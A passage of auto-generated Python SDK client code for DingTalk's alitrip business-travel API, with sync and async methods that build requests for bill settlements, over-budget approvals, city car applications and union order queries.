headers = dingtalkalitrip__1__0_models.BillSettementHotelHeaders()
return self.bill_settement_hotel_with_options(request, headers, runtime)
async def bill_settement_hotel_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementHotelHeaders()
return await self.bill_settement_hotel_with_options_async(request, headers, runtime)
def bill_settement_hotel_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
headers: dingtalkalitrip__1__0_models.BillSettementHotelHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementHotelResponse(),
self.do_roarequest('BillSettementHotel', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/hotels', 'json', req, runtime)
)
async def bill_settement_hotel_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
headers: dingtalkalitrip__1__0_models.BillSettementHotelHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementHotelResponse(),
await self.do_roarequest_async('BillSettementHotel', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/hotels', 'json', req, runtime)
)
def get_flight_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders()
return self.get_flight_exceed_apply_with_options(request, headers, runtime)
async def get_flight_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders()
return await self.get_flight_exceed_apply_with_options_async(request, headers, runtime)
def get_flight_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse(),
self.do_roarequest('GetFlightExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getFlight', 'json', req, runtime)
)
async def get_flight_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse(),
await self.do_roarequest_async('GetFlightExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getFlight', 'json', req, runtime)
)
def bill_settement_car(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementCarHeaders()
return self.bill_settement_car_with_options(request, headers, runtime)
async def bill_settement_car_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementCarHeaders()
return await self.bill_settement_car_with_options_async(request, headers, runtime)
def bill_settement_car_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
headers: dingtalkalitrip__1__0_models.BillSettementCarHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementCarResponse(),
self.do_roarequest('BillSettementCar', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/cars', 'json', req, runtime)
)
async def bill_settement_car_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
headers: dingtalkalitrip__1__0_models.BillSettementCarHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementCarResponse(),
await self.do_roarequest_async('BillSettementCar', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/cars', 'json', req, runtime)
)
def bill_settement_btrip_train(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders()
return self.bill_settement_btrip_train_with_options(request, headers, runtime)
async def bill_settement_btrip_train_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders()
return await self.bill_settement_btrip_train_with_options_async(request, headers, runtime)
def bill_settement_btrip_train_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
headers: dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse(),
self.do_roarequest('BillSettementBtripTrain', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/btripTrains', 'json', req, runtime)
)
async def bill_settement_btrip_train_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
headers: dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse(),
await self.do_roarequest_async('BillSettementBtripTrain', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/btripTrains', 'json', req, runtime)
)
def sync_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.SyncExceedApplyHeaders()
return self.sync_exceed_apply_with_options(request, headers, runtime)
async def sync_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.SyncExceedApplyHeaders()
return await self.sync_exceed_apply_with_options_async(request, headers, runtime)
def sync_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.SyncExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.remark):
query['remark'] = request.remark
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.thirdparty_flow_id):
query['thirdpartyFlowId'] = request.thirdparty_flow_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
if not UtilClient.is_unset(request.status):
query['status'] = request.status
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.SyncExceedApplyResponse(),
self.do_roarequest('SyncExceedApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/exceedapply/sync', 'json', req, runtime)
)
async def sync_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.SyncExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.remark):
query['remark'] = request.remark
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.thirdparty_flow_id):
query['thirdpartyFlowId'] = request.thirdparty_flow_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
if not UtilClient.is_unset(request.status):
query['status'] = request.status
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.SyncExceedApplyResponse(),
await self.do_roarequest_async('SyncExceedApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/exceedapply/sync', 'json', req, runtime)
)
def add_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.AddCityCarApplyHeaders()
return self.add_city_car_apply_with_options(request, headers, runtime)
async def add_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.AddCityCarApplyHeaders()
return await self.add_city_car_apply_with_options_async(request, headers, runtime)
def add_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.AddCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.cause):
body['cause'] = request.cause
if not UtilClient.is_unset(request.city):
body['city'] = request.city
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.date):
body['date'] = request.date
if not UtilClient.is_unset(request.project_code):
body['projectCode'] = request.project_code
if not UtilClient.is_unset(request.project_name):
body['projectName'] = request.project_name
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.third_part_cost_center_id):
body['thirdPartCostCenterId'] = request.third_part_cost_center_id
if not UtilClient.is_unset(request.third_part_invoice_id):
body['thirdPartInvoiceId'] = request.third_part_invoice_id
if not UtilClient.is_unset(request.times_total):
body['timesTotal'] = request.times_total
if not UtilClient.is_unset(request.times_type):
body['timesType'] = request.times_type
if not UtilClient.is_unset(request.times_used):
body['timesUsed'] = request.times_used
if not UtilClient.is_unset(request.title):
body['title'] = request.title
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.finished_date):
body['finishedDate'] = request.finished_date
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.AddCityCarApplyResponse(),
self.do_roarequest('AddCityCarApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def add_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.AddCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.cause):
body['cause'] = request.cause
if not UtilClient.is_unset(request.city):
body['city'] = request.city
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.date):
body['date'] = request.date
if not UtilClient.is_unset(request.project_code):
body['projectCode'] = request.project_code
if not UtilClient.is_unset(request.project_name):
body['projectName'] = request.project_name
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.third_part_cost_center_id):
body['thirdPartCostCenterId'] = request.third_part_cost_center_id
if not UtilClient.is_unset(request.third_part_invoice_id):
body['thirdPartInvoiceId'] = request.third_part_invoice_id
if not UtilClient.is_unset(request.times_total):
body['timesTotal'] = request.times_total
if not UtilClient.is_unset(request.times_type):
body['timesType'] = request.times_type
if not UtilClient.is_unset(request.times_used):
body['timesUsed'] = request.times_used
if not UtilClient.is_unset(request.title):
body['title'] = request.title
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.finished_date):
body['finishedDate'] = request.finished_date
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.AddCityCarApplyResponse(),
await self.do_roarequest_async('AddCityCarApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def bill_settement_flight(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementFlightHeaders()
return self.bill_settement_flight_with_options(request, headers, runtime)
async def bill_settement_flight_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementFlightHeaders()
return await self.bill_settement_flight_with_options_async(request, headers, runtime)
def bill_settement_flight_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
headers: dingtalkalitrip__1__0_models.BillSettementFlightHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementFlightResponse(),
self.do_roarequest('BillSettementFlight', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/flights', 'json', req, runtime)
)
async def bill_settement_flight_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
headers: dingtalkalitrip__1__0_models.BillSettementFlightHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementFlightResponse(),
await self.do_roarequest_async('BillSettementFlight', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/flights', 'json', req, runtime)
)
def get_hotel_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders()
return self.get_hotel_exceed_apply_with_options(request, headers, runtime)
async def get_hotel_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders()
return await self.get_hotel_exceed_apply_with_options_async(request, headers, runtime)
def get_hotel_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse(),
self.do_roarequest('GetHotelExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getHotel', 'json', req, runtime)
)
async def get_hotel_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse(),
await self.do_roarequest_async('GetHotelExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getHotel', 'json', req, runtime)
)
def query_union_order(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryUnionOrderHeaders()
return self.query_union_order_with_options(request, headers, runtime)
async def query_union_order_async(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryUnionOrderHeaders()
return await self.query_union_order_with_options_async(request, headers, runtime)
def query_union_order_with_options(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
headers: dingtalkalitrip__1__0_models.QueryUnionOrderHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.union_no):
query['unionNo'] = request.union_no
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryUnionOrderResponse(),
self.do_roarequest('QueryUnionOrder', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/unionOrders', 'json', req, runtime)
)
async def query_union_order_with_options_async(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
headers: dingtalkalitrip__1__0_models.QueryUnionOrderHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.union_no):
query['unionNo'] = request.union_no
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryUnionOrderResponse(),
await self.do_roarequest_async('QueryUnionOrder', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/unionOrders', 'json', req, runtime)
)
def query_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
